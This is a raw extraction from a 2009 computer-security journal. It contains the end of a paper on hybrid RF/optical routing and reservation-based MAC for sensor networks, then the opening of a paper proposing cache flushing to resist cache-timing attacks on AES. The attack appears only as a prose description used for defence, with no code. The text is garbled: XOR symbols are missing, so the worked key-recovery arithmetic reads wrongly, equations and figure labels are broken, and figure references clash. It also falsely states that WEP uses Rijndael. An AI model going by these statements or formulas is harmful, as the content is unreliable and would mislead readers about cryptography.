Table 1 Typical QoS requirements for several service classes
II. RELATED WORK Inherently a multi-path protocol with QoS measurements and
a good fit for routing of multimedia streams in WSN. Multi-
flow Real-time Transport Protocol (MRTP) [2] is suited for
real-time streaming of multimedia content by splitting packets
over different flows. However, MRTP does not specifically
address energy efficiency considerations in WMSNs. In [3], awakeup scheme is proposed to balance the energy and delay
constraints.
In [4], the interesting feature of the proposed protocol is to
establish multiple paths (optimal and suboptimal) with
different energy metrics and assigned probabilities. In [5], a
Multi-Path and Multi-SPEED routing protocol is proposed for
WSN to provide QoS differentiation in timeliness and
reliability.
In [6], an application admission control algorithm is
proposed whose objective is to maximize the network lifetime
(IJCSIS) International Journal of Computer Science and Information Security
Vol. 4, No. 1 & 2, 2009
ISSN 1947 5500104
8/14/2019 International Journal of computer science and Information Security
http://slidepdf.com/reader/full/international-journal-of-computer-science-and-information-security 111/215
subject to bandwidth and reliability constraints of the
application. An application admission control method is
proposed in [7], which determines admissions based on the
added energy load and application rewards. While these
approaches address application level QoS considerations, they
fail to consider multiple QoS requirements (e.g., delay,
reliability, and energy consumption) simultaneously, as
required in WMSNs.
The use of image sensors is explored in [8], in which visualinformation is used to gather topology information that is then
leveraged to develop efficient geographic routing schemes. A
similar scenario is considered in [9] where imaging data for
sensor networks results in QoS considerations for routing
Recent studies have considered the effect of unidirectional
links [10], and report that as many as 5% to 10% of links in
wireless ad hoc networks are uni-directional [11] due to
various factors. Routing protocols such as DSDV and AODV
which use a reverse path technique implicitly ignore such
unidirectional links, and are therefore not relevant in this
scenario. Other protocols such as DSR [10],
ZRP [12] or SRL [13] have been designed or modified to
accommodate unidirectionality, by detecting unidirectional
links, and then providing a bi-directional abstraction for such
links [14], [15], [16], [17]. The simplest and most efficient
solution proposed for dealing with unidirectionality is
Tunneling [18], in which bi-directionality is emulated for a
uni-directional link by using bi-directional links on a reverse
backchannel to establish the tunnel.
Tunneling also prevents implosion of acknowledgement
packets and looping by simply repressing link layer
acknowledgments for tunneled packets received on a
unidirectional link. Tunneling however works well in a mostly
bi-directional network with few unidirectional links [10].
Our contribution in two manifold. We’ve given a novelrouting algorithm and also introduced a novel approach to
improve QoS at Network and MAC layer. In Section III wepropose the Hybrid based RF-FSO System which includes the
routing model, a novel routing approach to send the
aggregated data via FSO links to sink and a suitable Medium
Access Control Layer Protocol to improve the Quality of
Service
III. PROPOSED HYBRID FSO/RF BASED SYSTEM
The key observation to our hybrid architecture is that in wired
networks, the delay is independent of the physical distance
between the source and sink, but in case of multi-hop wireless
sensor networks, the end-to-end delay depends on not only
single hop delay, but also on the distance a packet travels.In view of this, the key design goal of such architecture is to
support a soft real-time communication service with a desired
delivery speed across the sensor network, using FSO links for
high bandwidth applications and RF links for initiating routing
paths and low bandwidth applications.
NETWORK MODELIn Figure 1, the base station is elevated over the RF/FSO WSN
deployment area. There are two types of channels in the
RF/FSO WSN:
1) RF peer-to-peer channels
2) Narrow line of sight (LOS) FSO channels that connect the
cluster heads to the base station.
The FSO link is achieved by using a passive modulating
optical retro-reflector mounted on each node. The base station
steers a narrow optical beam to interrogate all the FSO nodes
in the field. Nodes that are too far from the base station, or
which do not have Line Of Sight to the base station,
communicate with the base station through RF peer-to-peer
multi-hop links. Due to this some of the nodes in the network act as cluster heads.
Base Station
Tier 1
Cluster Heads
Tier 2
Sensor Nodes
Tier 3
Figure 1- Multiple Tier Network Structure for Hybrid RF-FSO
In such RF/FSO based wireless sensor network, none of the
nodes communicate directly to the sink (base station) using RF
links.
ROUTING PROTOCOL DESIGN
We consider a geographic WMSN which consist of finite set
of sensor nodes which can be represented as N={ n1,n2,...,nN}
whereas finite set of links between them are L={l 1,l2,...,lN}.
The location of the base station and the sensor nodes is fixed
that can be obtained through GPS. The nodes that are basically
at 1-hop distance from the Base Station are Cluster heads that
uses FSO link for their communication. The cluster heads are
equipped with RF/optical trans-receiver (consisting of
Infrared/semiconductor laser and photo-detectors). Each
Cluster Head S x has a position ( xa, ya) and directionalorientation θ x, and can orient its transmitting laser to cover a
contiguous scanning area, given as
α/2 + θx ≤ ϕ x ≤ +α/2 + θx. (1)
Following the model as depicted in Figure 2, each cluster head
Sx can send data over oriented sector ϕ x of α degrees, for a
fixed angle 0 < α < 2π. The receiving photo-detector is omni-
directional and can thus receive data from any direction, so
that the sensing region of the cluster head is not only limited
to its communication sector. For another cluster head S y to
receive data from S x two conditions must be met:
(IJCSIS) International Journal of Computer Science and Information Security
Vol. 4, No. 1 & 2, 2009
ISSN 1947 5500105
8/14/2019 International Journal of computer science and Information Security
http://slidepdf.com/reader/full/international-journal-of-computer-science-and-information-security 112/215
1) The distance between them should be lesser than the
communication range R(n) of the sender cluster head, i.e.,
D(Sx, Sy) R(N).
Sx
Sy
N
θx
x
R
Sz
Figure 2 Cluster head Sy falls into communication sector of Sx
2) The receiving cluster head must be within the ϕ x of the
sender cluster head, i.e., (xb, yb)∈ ϕ x, where (xb, yb) defines
the location of the receiver cluster head. For this setup, S x may
directly talk to S y; however, Sy can only talk to Sx via reverse
route, with other cluster heads in the network acting as simple
routers [1].
Let us suppose that cluster head Sx is initiating next hop
selection to find routing routes. The coordinates of a Sx (xa,ya)
is piggybacked in the message broadcast by Sx. Thus a
neighbor node Sy know the position of tits upstream node Sx,
its own position , i.e., Sy (xb, yb) and the sink’s location.Further we assume that each cluster head knows about its
neighborhood (any algorithm can be used to find out theneighborhood of a cluster head, e.g., Neighborhood discovery
algorithm (NDA) as proposed by [1]). Since cluster heads are
equipped with hybrid RF/FSO links, so the first phase in our
design is to discover multiple routing paths from source
cluster heads to sink cluster head or base station. To establish
a path, a probe (COMB) message is broadcast to every 1-hop
neighbor initially by the source for route discovery. The
selected next hop CH will continue to broadcast COMB
message to find their next hop, and so forth until sink CH is
reached.
The information that is contained in a COMB message is
shown below
Fixed Attributes
SourceID SinkID
DeviationAngle SrcToSinkHopCout
Variable Attributes
HopCount PreviousHop Position
Figure 3- Packet format of COMB
The COMB message is identified by the SourceID, SinkID.
DeviationAngle (denoted by α) specifies the unique direction
where a path will traverse during path establishment. The
fixed attributes in a COMB are set by the source and not
changed while the COMB is propagated across the network.
On the other hand, when an intermediate CH broadcasts a
COMB, it will change the variable attributes in the message.
Hop-Count is the hop count from the source to the current CH.
PreviousHop is the identifier of the current CH. Position
denotes the absolute coordinates of the current CH.
A cluster head receiving a COMB will calculate its distance
from the destination/sink CH. If the distance between thecluster head that received the COMB message and the sink
CH is lesser than the distance between the source CH to the
sink CH and the CH that received the PROBE message lies
inside the communication sector of source CH, then that CH
will become the next hop CH. The same procedure will be
repeated for all other CH’s and multiple delivery guaranteedrouting paths from Source CH to sink CH will be discovered
that will use FSO link for multimedia transmissions.
The next phase is to find the best possible routing path from
already explored multiple paths. In order to do so, we assume
a Reference Line directly connecting source CH and the
destination CH.
For each and every path, we calculate the distance between
every CH that comes along that path and the Reference Line
and then take its average.
Dpath
N
1i
id
Hopcount-1
CH0
CH5
CH4
CH13
CH3
CH2
CH1
CH10
CH9 CH8
CH7
CH6
R e f e r e n c e LI n e
CH12
CH11
d1
d3d2Source CH
Sink CH
Path 1
Path 2
Path 4 Path 3
Figure 4 – Mulitpath Establishment Phase
where, di for Path1 is the sum of d1, d2 and d3 which are the
distances of CH1, CH2 and CH3 from the Reference Line.
Similarly, we will find Dpath2...,DpathM where M are the total
number of routing paths explored from source CH to sink CH.
We will select that path for routing multimedia application
which has got smallest value of Dpath. Once the best path has
been explored, then we can use FSO links and corner cube
retro reflector CCR for bandwidth hungry applications.
(IJCSIS) International Journal of Computer Science and Information Security
Vol. 4, No. 1 & 2, 2009
ISSN 1947 5500106
8/14/2019 International Journal of computer science and Information Security
http://slidepdf.com/reader/full/international-journal-of-computer-science-and-information-security 113/215
IV. MAC QoS PROVISIONINGResearch efforts to provide MAC layer QoS can be classified
mainly into (i) channel access policies, (ii) scheduling and
buffer management, and (iii) error control.
(i) Channel Access PolicyMotivated by the power-aware protocol [20], we define
Cluster-head Reservation based MAC scheme (CRB-MAC).
We make the following assumptions:
i. All nodes are synchronized to a global time, according tosome synchronization scheme and time is sliced in frames of
fixed length.
ii. Loss of packets can only occur due to collisions or missed
deadlines.
iii. Admission control has been performed already, so that the
offered load can be sustained by the network.
iv. The network is stationary, i.e., there is no mobile node.
Let Y(i) be a node in the network such that total number of
nodes Ytotal =
N
i
iY
1
. The range R(x) of a cluster-head 'x'
contains a set of cluster-heads within its RF/FSO range.R(x) = {h│h is in transmission range of cluster-head}
There is a set R(x, y) which contains all set of cluster heads
in common range of two cluster-heads
R(x, y) = R(x) ∩ R(y)
We assume that the geographic area of the network is
divided into rectangular grids of equal size. Each gird of size
Ca x Cb covers at least one cluster head. Each cluster head has
its geographic location (found via GPS) which is mapped on
one-to-one basis to the grid location.
Ca
Cb R
H (1,1) H (1,2)
H (2,1) H (2,2)
R a d i u
s
C l u s t e r h e a d c o m
m u n i c a t i o n r a n g e
Figure 5 - Cluster Head Grid
Each frame is divided, into the Reservation Period (RP),
during which nodes compete to establish new reservations or
cancel reservations, and the Contention-Free Period (CFP),
during which they send data packets without contention during
the reserved transmission windows and sleep when they do not
have a packet to send or receive.
The Reservation Period is divided in “Reservation Periodslots (RP-slots)”, each having a fixed length (which is enoughfor three reservation messages to be transmitted).
The Contention-Free period is divided in a Contention-Free
(CF) slots. Each CF-slot has fixed length, long enough for a
transmission of a data packet and an acknowledgment.
Each station δ keeps the reservation information in a
Reservation Table (RT), which keeps track of the IDs of the
nodes (within range) that are transmitting or receiving dataduring each Contention Free slot. When a node joins the
network it has to stay awake for some period to hear the
ongoing transmissions and to update its reservation table.
Reservation Period
During the Reservation Period, two types of “reservation procedures” can take place, i.e., the Connection Establishment
procedure and the Connection Cancelation procedure.
A station that needs to initiate a Connection Establishment
or Connection Cancelation can do so in the pre-specified
Reservation Slot for its grid.
A host in a grid H(x, y) can initiate a reservation procedure
only during the reservation slot 'r' such that r = 3x+2y+5.
This ensures that only one reservation in H a rectangular area
of 3x3 grids can take place in one reservation slot.
T(1, 1) T(1, 2) T(1, 3)
T(2, 1) T(2, 2) T(2, 3)
T(3, 1) T(3, 2) T(3, 3)
Figure 6- Reservation Slot using Grid
When a station needs to make a connection establishment or
cancellation, it senses the channel to determine if another
station of the same grid is transmitting. The station proceedswith a transmission if the medium is determined to be idle for
a specified interval. If the medium is found to be busy, or the
first message is not sent successfully, by a sender then the
exponential back-off algorithm is followed and the station
chooses a subsequent frame to re-initiate its request.
The Connection Establishment procedure takes place for a
real-time station every time a new real time session begins.
Datagram (non-real-time) traffic is not sensitive to delay, thus
nodes may buffer the packets up to a “burst length” N andthen make a request for sending the whole burst. The
reservation establishment involves the exchange of three
control messages:
(a) A Connection Request CR(x, y) is sent by a node x to a
neighbor y for which it has real-time or non-real-time packets.
Packet length Free SlotsDeadline for the real-time data
packet
Figure 7(a) Real time data packet format
(IJCSIS) International Journal of Computer Science and Information Security
Vol. 4, No. 1 & 2, 2009
ISSN 1947 5500107
8/14/2019 International Journal of computer science and Information Security
http://slidepdf.com/reader/full/international-journal-of-computer-science-and-information-security 114/215
Packet length Free SlotsNumber of buffered packets of non-real time data to be sent
Figure 7(b) Non-real time data packet format
(b) A Connection Acknowledgment CA(y, x) is sent by a node
y to a neighbor x. The CR from x contains the information of
free slots of x. Node y scans for all of its free slots and
compares it with the free slots of x.
Then, it schedules the requested packet in a common free slot
in its Reservation Table. Then, the receiver indicates in the
CA which reserved slot(s) the sender should use.
RT (i) = {Fs| Fs Є {XFs ∩ YFs}
(c) A Slot Rese SRB (x, y) is sent by a node x to all other nodes
and includes the reserved slots that x has reserved. Thus all the
nodes in neighborhood become also aware of the reservation.
Connection Request (CR)
Connection Acknowledgement (CA)
Slot Reservation Broadcast (SRB)
S l o t R
e s e r v a t i o n
B r o a d c a s t ( S
R B )
Cluster Head Z
Cluster Head XCluster Head Y
Figure 8- Connection Establishment between Node X and Node Y
The Connection Cancelation is invoked when a sender has no
more packets to send during its real-time session. Twomessages are involved in the Reservation Cancelation:
(a) The Connection Cancel CC(x, y) sent by a node x to node y
(b) The Connection Cancel Acknowledgment CC-ACK(y, x),
sent by node y to x.
Contention-Free Period
During the CFP, the stations wake up in the predetermined
transmission slots according to their Reservation Table, to
send or receive data packets, and sleep the rest of the period.
In each slot, the sender sends a data packet, with size specified
by the sender and receives an acknowledgment (ACK) sent by
the receiver. If a node does not have any data to send or
receive during a Contention Free slot, then it switches off.Once the reservation for a real time session is established, it is
kept until an explicit reservation cancelation is performed as
described above. The sender will use the reserved slot to send
its data packets until the session is over. Reservations for
datagram traffic are valid only for the current frame and the
hosts clear their Reservation Table for those slots that have
non-real-time transmissions, after the CFP is over. Thus no
explicit cancelation is needed in case of datagram reservations.
ii) Scheduling and Buffer Management
The foundation of a proper QoS provisioning lies in the
appropriate service model that describes a set of offered
services. Existing QoS aware networks, like ATM, InteServ,
and DiffServ, designed their service models based on QoS
requirements of applications in the corresponding network
infrastructure. We have laid the foundation of our service
model for hybrid fso-rf based multimedia network.
First the multimedia data is classified into real time and non
real time data according to the delay requirements. Forachieving desired QoS for a real time application it is usually
mandatory to maintain a specific bandwidth during real time
transmission time.
We categorize applications to the following classes.
• Bonded service represents real-time applications that require
absolute continuity, i.e., the transmission of data cannot be
disconnected between the session.
• Semi-bonded service represents real-time applications that
can tolerate a reasonably low disconnection in-between the
transmission.
Session 1
Session 2
Session N-1
Session N
Scheduler
MAC Feedback
Channel State
montior/ Predictor
Transceiver
Figure 9- Wireless Multimedia Scheduler
V. MAC QoS PROVISIONING PROOFThe defined changes in MAC layer provide better QoS under
the assumptions as taken before in the paper. The hidden node
problem causes the collision and certain critical information is
lost. If connection establishment information is lost then the
reservation tables can become inconsistent and collisions in
data packets may occur or Contention Free slots maybe
wasted. When a CR packet is collided, no reservation
information is lost. When CA or SRB packets are lost,conflicting reservations can happen, which may result in data
packets collisions. When Connection Cancellation or CC-
ACK packets are lost, then reservation cancelation
information maybe ^lost and the slots may not be able to be
reserved for other hosts, thus data slots remain unused.
We assume that a node initiates a reservation procedure with
node that involves CF-slot. To prove MaC QoS provisioning
we use the following lemma.
Lemma 1: A node k in the network can cause a reservation
message to be missed by a node in during Connection
(IJCSIS) International Journal of Computer Science and Information Security
Vol. 4, No. 1 & 2, 2009
ISSN 1947 5500108
8/14/2019 International Journal of computer science and Information Security
http://slidepdf.com/reader/full/international-journal-of-computer-science-and-information-security 115/215
Establishment phase, if and only if, it is couple of hops away,
i.e., 1,2,3 or 4 hops-way from the sender
Lemma 2: All Connection Reservation Messages are received
successfully by the nodes during the time that any reservation
procedure is taking place, if and only if, any node initiates a
reservation procedure at reserved slot.
Lemma 3: The protocol ensures that all nodes in
successfullyupdate their reservation tables whenever connection
establishment or connection cancellation procedure take place.
.
VI. CONCLUSION AND FUTURE WORKWe have presented a hybrid FSO/RF based model for wireless
multimedia sensor network. We have proposed a new routing
protocol for such networks to provide energy efficient real
time communication. As future work we plan to simulate our
protocol and compare it with similar reservation based
protocol. It is expected that our protocol consumes less energy
for routing multimedia data with minimum delay. At MAC
layer we use a fully distributed reservation scheme which is
able to provide bandwidth guarantees and energy conservation
using geographic information.
REFERENCES [1] U. N. Okorafor and D. Kundur, “Efficient routing protocols for a
free space optical sensor network,” in Proceedings of 2nd IEEE International Conference on Mobile Adhoc and Sensor Systems Conference, pp. 251 – 258, Washington, DC, USA, November 2005.[2] S. Mao, D. Bushmitch, S. Narayanan, and S. Panwar, “MRTP: amultiflow real-time transport protocol for ad hoc networks,”
Multimedia, IEEE Transactions on, vol. 8, no. 2, pp. 356 – 369, April2006.[3] X. Yang and N. H. Vaidya, “A wakeup scheme for sensor networks: Achieving balance between energy saving and end-to-end
delay,” RTAS, vol. 00, p. 19, 2004.[4] R. Shah and J. Rabaey, “Energy aware routing for low energy adhoc sensor networks,” 2002. \ [5] Felemban, E.; Chang-Gun Lee; Ekici, E., "MMSPEED: multipath
Multi-SPEED protocol for QoS guarantee of reliability and.Timeliness in wireless sensor networks," Mobile Computing, IEEE
Transactions on , vol.5, no.6, pp. 738-754, June 2006[6] M. Perillo, W. Heinzelman, Sensor management policies to
provide application QoS, Ad Hoc Networks (Elsevier) 1 (2 – 3)(2003) 235 – 246.[7] A. Boulis, M. Srivastava, Node-level energy management forsensor networks in the presence of multiple applications, in: Proc. of
IEEE Intl. Conf. on Pervasive Computing and Communications
(PerCom), Dallas – Forth Worth, TX, USA, 2003, pp. 41 – 49.[8] L. Savidge, H. Lee, H. Aghajan, A. Goldsmith, QoS based
geographic routing for event-driven image sensor networks, in: Proc.of IEEE/CreateNet Intl. Workshop on Broadband Advanced SensorNetworks (BaseNets), Boston, MA, October 2005.[9] K. Akkaya, M. Younis, An energy-aware QoS routing protocolfor wireless sensor networks, in: Proc. of Intl. Conf. on Distributed
Computing Systems Workshops (ICSDSW), Washington, DC, 2003.[10] V. Ramasubramanian and D. Mosse, “A circuit-based approachfor routing in unidirectional links networks.,” in INRIA Research
Report 3292 , 1997.
[11] V. Ramasubramanian and D. Mosse, “Statistical analysis of connectivity in unidirectional ad hoc networks,” in International Workshop on Ad Hoc Networking (IWAHN)., Vancouver, Canada,,2002.
[12] D. B. Johnson and D. A. Maltz, “Dynamic source routing in adhoc wireless networks,” in Mobile Computing, Imielinski and Korth,
Eds., vol. 353. Kluwer Academic Publishers, 1996.
[13] M. R. Pearlman Z. J. Haas and P. Samar, “The zone routing protocol (zrp) for ad hoc networks,” in Internet Draft - Mobile Ad
Hoc NETworking (MANET) Working Group of the Internet
Engineering Task Force (IETF), 2001.
[14] V. Ramasubramanian, R. Chandra, and D. Mosse, “Providing a bidirectional abstraction for unidirectional ad hoc networks,” in
Proceedings of IEEE Infocom, NewYork, NY, USA, 2002, pp. 1258 – 1267.
[15] L. Bao and J. J. Garcia-Luna-Aceves, “Link-state routing innetworks with unidirectional links,” in In Proceedings of
International Conference on Computer Communications and
Networks (IC3N),, Boston, Massachusetts, 1999, pp. 358 – 363.
[16] W. Dabbous, E. Duros, and T. Ernst, “Dynamic routing innetworks with unidirectional links,” in WOSBIS’97 , Budapest,Hungary, October 1997, pp. 35 – 47.[17] M. Marina and S. Das, “Routing performance in the presence of
unidirectional links in multihop wireless networks,” in Proc. ACM
MobiHoc., 2002, pp. 12 – 23.
[18] R. Prakash, “A routing algorithm for wireless ad hoc networkswith unidirectional links,” Wireless Networks, vol. 7, no. 6, pp. 617 – 625, 2001.
[19] S. Nesargi and R. Prakash, “A tunneling approach to routingwith unidirectional links in mobile ad-hoc networks,” in In
Proceedings Ninth International Conference on Computer
Communications and Networks., 2000, pp. 522 – 7.
[20] M. Adamou, I. Lee, and I. Shin, “An energy efficient real-timemedium access control protocol for wireless ad-hoc networks,” inWIP session of IEEE Real-time systems symposium, London, UK,2001.
(IJCSIS) International Journal of Computer Science and Information Security
Vol. 4, No. 1 & 2, 2009
ISSN 1947 5500109
8/14/2019 International Journal of computer science and Information Security
http://slidepdf.com/reader/full/international-journal-of-computer-science-and-information-security 116/215
(IJCSIS) International Journal of Computer Science and Information Security,
Vol. 4, No. 1, August, 2009
Minimizing Cache Timing Attack Using
Dynamic Cache Flushing (DCF) Algorithm
Jalpa Bani
Computer Science and Engineering Department
University of Bridgeport
Bridgeport, CT 06601
jbani@bridgeport.edu
Syed S. Rizvi
Computer Science and Engineering Department
University of Bridgeport
Bridgeport, CT 06601
srizvi@bridgeport.edu
Abstract—Rijndael algorithm was unanimously chosen asthe Advanced Encryption Standard (AES) by the panel of researchers at National Institute of Standards andTechnology (NIST) in October 2000. Since then, Rijndaelwas destined to be used massively in various software as
well as hardware entities for encrypting data. However, afew years back, Daniel Bernstein [2] devised a cache-timing attack that was capable enough to break Rijndael’sseal that encapsulates the encryption key. In this paper,we propose a new Dynamic Cache Flushing (DCF)algorithm which shows a set of pragmatic software
measures that would make Rijndael impregnable to cachetiming attack. The simulation results demonstrate that theproposed DCF algorithm provides better security by
encrypting key at a constant time.
Keywords- dynamic cache flushing, Rijndaelalgorithm, timing attack.
I. INTRODUCTION
Rijndael is a block cipher adopted as an encryptionstandard by the U.S. government. It has been analyzedextensively and is now used widely worldwide as wasthe case with its predecessor, the Data EncryptionStandard (DES). Rijndael, the AES standard is currentlyused in various fields. Due to its impressive efficiency[8], it’s being used in high-speed optical networks, it’sused in military applications that encrypt top secret data,and it’s used in banking and financial applicationswherein secured and real-time transfer of data is a top-priority.
Microsoft has embraced Rijndael and implementedRijndael in its much talked about DotNet (.NET)
Framework. DotNet 3.5 has Rijndael implementation inSystem.Security.Cryptography namespace. DotNetframework is used by millions of developers around theworld to develop software applications in numerousfields. In other words, software implementation of Rijndael is touching almost all the fields thatimplements cryptography through the DotNetframework.
Wireless Network Security has no exception. Wired
Equivalent Privacy (WEP) is the protocol used in
wireless networks to ensure secure environment. When
WEP is turned on in a wireless network, every packet of data that is transmitted from one station to another is
first encrypted using Rijndael algorithm by taking thepackets’ data payload and a secret encryption key called
WEP key. The encrypted data is then broadcasted to
stations registered on that wireless network. At the
receiving end, the “wireless network aware stations”utilize the WEP key to decrypt data using Rijndael
algorithm. Rijndael supports a larger range of block and
key sizes; AES has a fixed block size of 128 bits and a
key size of 128, 192 or 256 bits, whereas Rijndael can
be specified with key and block sizes in any multiple of
32 bits, with a minimum of 128 bits and a maximum of 256 bits [6].
This algorithm implements the input, output, and
cipher key where each of the bit sequences may contain128, 192 or 256 bits with the condition that the input and
output sequences have the same length. However, this
algorithm provides the basic framework to make thecode scalable. Look up tables have been used to make
Rijndael algorithm faster and operations are performed
on a two dimensional array of bytes called states. State
consists of 4 rows of bytes, each of which contains Nb
bytes, where Nb is the input sequence length divided by32. During the start or end phase of an encryption or
decryption operation, the bytes of the cipher input or
output are copied from or to this state array.
The several operations that are implemented in this
algorithm are listed below [9]:
• Key Schedule: It is an array of 32-bit words that is
initialized from the cipher key. The cipher iterates
through a number of the cycles or rounds, each of which uses Nk words from the key schedule. This is
considered as an array of round keys, each containingNk words.
ISSN 1947 5500110
8/14/2019 International Journal of computer science and Information Security
http://slidepdf.com/reader/full/international-journal-of-computer-science-and-information-security 117/215
(IJCSIS) International Journal of Computer Science and Information Security,
Vol.4, No. August, 2009
• Finite Field Operations: In this algorithm finite field
operations are carried out, which refers to operations
performed in the finite field resulting in an element
within that field. Finite field operations such asaddition and multiplication, inverse multiplication,
multiplications using tables and repeated shifts areperformed.
• Rounds: At the start of the cipher the input is copied
into the internal state. An initial round key is then
added and the state is then transformed by iterating around function in a number of cycles. On completion
the final state is copied into the cipher output [1].
The round function is parameterized using a key
schedule that consists of a one dimensional array of 32-
bit words for which the lowest 4, 6 or 8 words are
initialized with the cipher. There are several stepscarried out during this operation:
SubBytes: As shown in Fig. 1, it is a non-linear
substitution step where each of the byte replaces with
another according to a lookup table.
ShiftRows: This is a transposition step where each row
of the state is shifted cyclically a certain number of
steps, as shown in Fig. 2.
MixColumns: This is a mixing operation which
operates on the columns of the state, combining the fourbytes in each column, as shown in Fig. 3.
AddRoundKey: Here each byte of the state is combined
with the round key; each round key is derived from the
cipher key using a key schedule [1], as shown in Fig. 4.
• Final Round: The final round consists of the same
operations as in the Round function except theMixColumns operation.
II. RELATED WORK
Parallelism or Parallel Computing has become a
key aspect of high performance computing today and its
fundamental advantages have deeply influenced modern
processor designers. It has become a dominant paradigm
in processor architecture in form of multicore processors
available in personal computers today. Sharing
processor resources like cache memory, sharing memory
maps in random access memory (RAM) and sharingcomputational power of the math coprocessors during
execution of multiple processes in the operating
systems, has become an inevitable phenomenon. Few
years back, Intel introduced hyper-threading technology
in its Pentium 4 processors, wherein the sharing of processor resources between process threads is extendedfurther by sharing memory caches. Shared access to
memory cache is a feature that’s available in all the
latest processors from Intel and AMD Athlon.
With all the hunky-dory talk about how parallel
computing has made Central Processing Unit’s (CPUs)very powerful today, the fundamentals of sharing
memory cache across the thread boundary has come
along opening doors for security vulnerabilities. The
shared memory cache can permit malicious threads of a
spy process to monitor execution of another thread that
implements Rijndael, allowing attackers to brute force
the encryption key [6, 7].
III. PROBLEM IN RIJNDAEL: CACHE TIMING ATTACK
Cache timing attack – the name speaks for itself. This
belongs to a pattern of attacks that concentrates on
monitoring the target cryptosystem, and analyzing the
time taken to execute various steps in the cryptographic
algorithm. In other words, the attack exploits the facts
that every step in the algorithm takes a certain time to
Figure 1. SubBytes
Figure 2. ShiftRows
Figure 3. MixColumn
ISSN 1947 5500111
8/14/2019 International Journal of computer science and Information Security
http://slidepdf.com/reader/full/international-journal-of-computer-science-and-information-security 118/215
(IJCSIS) International Journal of Computer Science and Information Security,
Vol.4, No. August, 2009
execute.
Although, the cache-timing attack is well-knowntheoretically, but it was only until April 2005 that a stout
researcher named Daniel Bernstein [2, 4] published thatthe weakness of Rijndael can reveal timing information
that eventually can be utilized to crack the encryption
key. In his paper, Daniel announced a successful cachetiming attack by exploiting the timing characteristics of
the table lookups.
Here is the simplest conceivable timing attack on
Rijndael. AES software implementations like Rijndael
that uses look-up tables to perform internal operations of
the cipher, such as Sboxes, are the one that are most
vulnerable to this attack. For example, the variable-index array lookup T0[k[0] n[0]] near the beginning
of the AES computation. A typical hacker might think
that the time for this array lookup depends on the arrayindex and the time for the whole AES computation is
well correlated with the time for this array lookup. As aresult, the AES timings leak information about k[0]
n[0] and it can calculate the exact value of k[0] from the
distribution of AES timings as a function of n[0].
Similar comments apply to k[1] n[1], k[2] n[2],
etc. Assume, that the hacker watches the time taken by
the victim to handle many n's and totals the AES times
for each possible n[13], and observes that the overallAES time is maximum when n[13] is, say, 147. Suppose
that the hacker also observes, by carrying out
experiments with known keys k on a computer with the
same AES software and the same CPU, that the overallAES time is maximum when k[13] n[13] is, say, 8.
The hacker concludes that the victim's key k[13] is
147 8 = 155. This implies that a hacker can easily
attack a variable time AES algorithm and can crack the
encrypted data and eventually key [2].
Since in Rijndael algorithm all look up tables are
stored in the cache, by putting another thread or somedifferent way, attacker can easily get the encrypted data
from the cache. Fig.1 shows that AES implementation in
OpenSSL which does not take constant time. This wastaken on a Pentium M processor. It is a 128 x 128 array
of blocks where X axis shows one key for each row of
blocks and Y axis shows one input for each column of
blocks. Any combination of (key, Input) pair shows the
encryption process for that particular pair by indicatingthe fix pattern of colors at that place. We can see the
tremendous variability among blocks in Fig. 5. Due tothis variability, attacker can easily determine the weak
point, where the encryption took place by just analyzing
the color pattern.
The cache timing attack problem has been tackled
through various approaches [3]. Each solution has itsown pros and cons. For instance, Intel released a set of
compilers targeting their latest 64-bit processors. These
compilers would take the C++ code as input and output
a set of machine instructions that would not use CPU
cache at all. In other words, the resultant code has amachine instruction that does not use CPU cache for
temporary storage of data, in other words the cache is
disabled automatically.The other suggestion was to place all the lookup
tables in CPU registers rather than CPU cache, but this
would affect performance significantly. Hardware
approaches are also being considered. It has beensuggested to have a parallel Field-Programmable Gate
Array (FPGA) implementation or Application-Specific
Integrated Circuits (ASIC) implementation with a
separate coprocessor functioning with the existing CPU.This special coprocessor would contain special logical
circuitry that would implement Rijndael. Timing attack
can thus be avoided by barring other processes from
accessing the special coprocessor [5].
Figure 5. Open SSL AES timings for 128 keys and 128 inputs on a
Pentium M processor
Figure 4. AddRoundKey
ISSN 1947 5500112
8/14/2019 International Journal of computer science and Information Security
http://slidepdf.com/reader/full/international-journal-of-computer-science-and-information-security 119/215
(IJCSIS) International Journal of Computer Science and Information Security,
Vol.4, No. August, 2009
IV. PROPOSED DYNAMIC CACHE FLUSHING (DCF)
ALGORITHM
Numerous attempts have been made to address thetiming attack loophole in AES. After a deep analysis of the logical steps involved in the Rijndael algorithm, we
propose a novel technique to improvise the existing
Rijndael algorithm. Our proposed algorithm follows
variable-time AES algorithm by replacing it with a
constant-time (but not high-speed) AES algorithm
known as DCF (Dynamic Cache Flushing). Here,
constant means totally independent of the AES key and
input. The resulting DCF algorithm would be capable
enough to stand strong against the timing attacks.
In order to determine the constant-time, first we needto collect timings and then look for input-dependent
patterns. For example, we can repeatedly measure thetime taken by AES for once (key; input) pair, convert
the distribution of timings into a small block of colors,
and then repeat the same color pattern for many keys
and inputs.
A constant-time AES algorithm would have the sameblock of colors for every key and input pair, as shown in
Fig 2. Fig 2 is a 128 x 128 array of blocks. Here, X axis
indicates the key for each row of blocks and Y axis
shows the input for each column of blocks. The patternof colors in a block reflects the distribution of timingsfor that (Key; Input) pair. Here, for all (Key, Input)pairs, the color patterns remains the same, due to the
constant time. Hence, attacker cannot easily figure out at
which point of time the encryption of key and data took
place. DCF algorithm generates keys at a constant rate
on today's popular dual-core CPUs.
A. Description of the Proposed DCF Algorithm
The DCF algorithm is the improved version of
Rijndael. In other words, the basic
encryption/decryption process would remain unchanged.
However, there are few additional steps injected into theRijndael algorithm that would make it resilient to cache-
timing attack.
DCF algorithm – as the name rightly suggests, flushes
cache while the encryption of data is in progress. In
other words, the data that is being copied by the
program into the CPU cache during theencryption/decryption process is removed at periodic
intervals. The major advantage of doing this is that,
during a cache-timing attack, the spy process tries to tapthe data stored in look up tables in the CPU cache. Since
each instruction takes time to encrypt or decrypt thedata, attacker can break the data by just taking
difference of collected large body of timing data from
the target machine for the plaintext byte and collected
large body of reference timing data for each instruction.
Fig. 5 shows that encryption/decryption takes place at
random time and it can be easily determined by the spy
process. If data in the CPU cache is flushed dynamically
during the encryption or decryption process, it wouldmake life more difficult for the spy process, when it tries
to collect the data for sampling purposes. In addition, no
data in the cache implies that there is no specific place
or point that refers to the encryption process as shown in
Fig. 6.It should be noted in Fig. 6 that the graph maintains a
uniform pattern during the entire encryption/decryptionprocess. Due to this uniformity, an attacker would face
difficulty in tracking the exact time frame when
encryption/decryption took place. This is possible by
flushing the CPU cache at irregular intervals. Flushing
the cache ensures that an attacker will not get enoughinsight into the data pattern during the encryption
